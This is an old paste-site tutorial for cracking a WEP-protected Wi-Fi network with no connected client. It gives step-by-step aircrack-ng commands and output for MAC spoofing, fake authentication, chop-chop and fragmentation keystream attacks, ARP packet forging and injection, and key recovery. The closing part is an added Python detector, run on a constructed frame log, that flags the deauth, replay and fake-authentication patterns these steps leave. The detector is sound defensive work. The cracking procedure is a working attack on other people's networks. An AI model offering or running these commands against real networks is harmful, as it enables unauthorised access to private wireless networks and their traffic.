ak47suk1

wep no client

Sep 28th, 2010
cracking a wep encrypted network with no connected client (clientless):

-----------------------------------------------

(1) spoof the wireless card's mac address
(2) put the wireless card into monitor mode
(3) scan for the target AP using airodump-ng
(4) fake authentication using aireplay-ng option -1
(5) use the korek chop-chop attack, the fragmentation attack or
the old pre-PTW method (aireplay-ng -2 -p 0841 option)
(6) deauthenticate a non-connected client from the AP (speeds up injection; not sure why, but it usually works)
(7) find the wep key using aircrack-ng
------------------------------------------------
(1) spoof our wireless card's mac address:
ifconfig ath0 down
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0

my output is:
Current MAC: <my mac> (unknown)
Faked MAC:   00:11:22:33:44:55 (Cimsys Inc)

(2) put the wireless card into monitor mode:
ifconfig wifi0 up
ifconfig ath0 down
airmon-ng start wifi0

my output is:
...
Interface   Chipset     Driver

wifi0       Atheros     madwifi-ng
ath0        Atheros     madwifi-ng VAP (parent: wifi0)
ath1        Atheros     madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

(ath1 is the monitor-mode VAP, so the remaining commands use ath1)

(3) scan for the target AP using airodump-ng:

airodump-ng ath1

hit ctrl+c to quit, then note the channel and copy and paste the bssid (the AP's mac address):

airodump-ng -c <channel> -w <output> --bssid <APmac> ath1

(here we lock onto one specific AP so that we filter out any other possibility of interference from other APs on the same channel,
and hence reduce the chance of a failed auth/association or a failed attack)

other commands that can be used:

airodump-ng -w <output> --ivs -c <channel> ath1

(4) fake authentication using aireplay-ng option -1:

aireplay-ng -1 0 -e <APname> -a <APmac> -h <yourmac> ath1

another command that can be used (re-authenticates every 6000 seconds):
aireplay-ng -1 6000 -o 1 -q 10 -e <APname> -a <APmac> -h <yourmac> rausb0

(5) use the korek chop-chop attack, the fragmentation attack or
the old pre-PTW method (aireplay-ng -2 -p 0841 option):

#korek chop-chop attack (-4 option):
----------------------------------
1- make a XOR (keystream) file using the chop-chop attack, -4 option, to use with packetforge-ng:
aireplay-ng -4 -b <APmac> -h <yourmac> ath1

wait and answer yes ..

output is:
Saving plaintext in replay_whatever.cap...

Saving keystream in replay_whatever.xor

2- create an arp packet using packetforge-ng:

packetforge-ng -0 -a <APmac> -h <yourmac> -k 255.255.255.255 -l 255.255.255.255 -y replay_whatever.xor -w arp-request

output is:

wrote packet to: arp-request

3- inject the arp packet:
aireplay-ng -2 -r arp-request ath1

say yes... and wait..

4- find the wep key using aircrack-ng:

aircrack-ng <output>*.cap

#fragmentation attack (-5 option):
---------------------------------
1- make a XOR (keystream) file using the fragmentation attack, -5 option (generates a valid keystream), to use with packetforge-ng:

aireplay-ng -5 -b <APmac> -h <yourmac> ath1

answer yes..
output is:

Saving keystream in replay_whatever.xor

2- create an arp packet using packetforge-ng:

packetforge-ng -0 -a <APmac> -h <yourmac> -k 255.255.255.255 -l 255.255.255.255 -y replay_whatever.xor -w arp-request

3- inject the arp packet:

aireplay-ng -2 -r arp-request ath1

answer yes... and wait

4- find the wep key using aircrack-ng:

aircrack-ng <output>*.cap

#the old pre-PTW method (aireplay-ng -2 -p 0841 option):
--------------------------------------------------
1. aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <APmac> -h <yourmac> ath1

2. find the wep key using aircrack-ng:

aircrack-ng <output>*.cap
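Added example for the defender's side of the procedure above, not part of the original paste: a small Python detector that flags the traffic patterns these steps leave on the air (a deauth burst from the AP's address, one station re-sending the same WEP-encrypted frame with the same IV over and over, and that replay coming from a station that has just authenticated). The frame-log format, the AP and client addresses and the thresholds are constructed assumptions; 00:11:22:33:44:55 is the spoofed mac from step (1).

```python
from collections import defaultdict

# Constructed 802.11 frame summary (NOT a real capture). Columns:
# time subtype src dst bssid len iv   (iv = WEP IV in hex, "-" on management frames)
# aa:bb:cc:dd:ee:01 is the AP and 66:77:88:99:aa:bb a real client (both made up).
SAMPLE_LOG = (
    "0.00 auth   00:11:22:33:44:55 aa:bb:cc:dd:ee:01 aa:bb:cc:dd:ee:01 30 -\n"
    "0.01 assoc  00:11:22:33:44:55 aa:bb:cc:dd:ee:01 aa:bb:cc:dd:ee:01 48 -\n"
    # deauth burst with the AP's address as sender, six frames in 60 ms
    + "".join(f"0.{50+i} deauth aa:bb:cc:dd:ee:01 66:77:88:99:aa:bb aa:bb:cc:dd:ee:01 26 -\n" for i in range(6))
    # replay: the same encrypted frame (same IV, same length) from the spoofed station, 40 times in 0.4 s
    + "".join(f"1.{i:02d} data   00:11:22:33:44:55 ff:ff:ff:ff:ff:ff aa:bb:cc:dd:ee:01 68 1a2b3c\n" for i in range(40))
    # normal traffic: a real client whose IV changes on every frame
    + "2.00 data   66:77:88:99:aa:bb aa:bb:cc:dd:ee:01 aa:bb:cc:dd:ee:01 120 0a0b0c\n"
    + "2.10 data   66:77:88:99:aa:bb aa:bb:cc:dd:ee:01 aa:bb:cc:dd:ee:01 140 0a0b0d\n"
)

DEAUTH_BURST = 5     # deauth frames from one sender inside WINDOW seconds (assumed threshold)
REPLAY_REPEATS = 20  # identical (src, IV, length) data frames inside WINDOW seconds (assumed threshold)
WINDOW = 1.0

def parse(log):
    """One tuple per line: (time, subtype, src, dst, bssid, length, iv)."""
    return [(float(t), s, a, b, c, int(n), iv)
            for t, s, a, b, c, n, iv in (l.split() for l in log.splitlines() if l.strip())]

def _recent(times, t):
    """Append t to a per-key list, drop entries older than WINDOW, return how many remain."""
    times.append(t)
    while t - times[0] > WINDOW:
        times.pop(0)
    return len(times)

def detect(frames):
    """Sliding-window counters; returns sorted (time, indicator, station) alerts, one per pair."""
    alerts, authed = {}, set()
    deauths, replays = defaultdict(list), defaultdict(list)
    for t, sub, src, _dst, _bssid, ln, iv in frames:
        if sub == "auth":
            authed.add(src)                                   # remember who authenticated
        elif sub == "deauth":
            if _recent(deauths[src], t) >= DEAUTH_BURST:
                alerts.setdefault(("deauth_burst", src), t)
        elif sub == "data" and iv != "-":
            if _recent(replays[(src, iv, ln)], t) >= REPLAY_REPEATS:  # same IV+length = same frame
                alerts.setdefault(("wep_replay", src), t)
                if src in authed:                             # authenticated, then only replays
                    alerts.setdefault(("fake_auth_then_replay", src), t)
    return sorted((t, kind, sta) for (kind, sta), t in alerts.items())
```

Running detect(parse(SAMPLE_LOG)) yields one alert each for the deauth burst, the replay, and the authenticate-then-replay combination, and nothing for the real client.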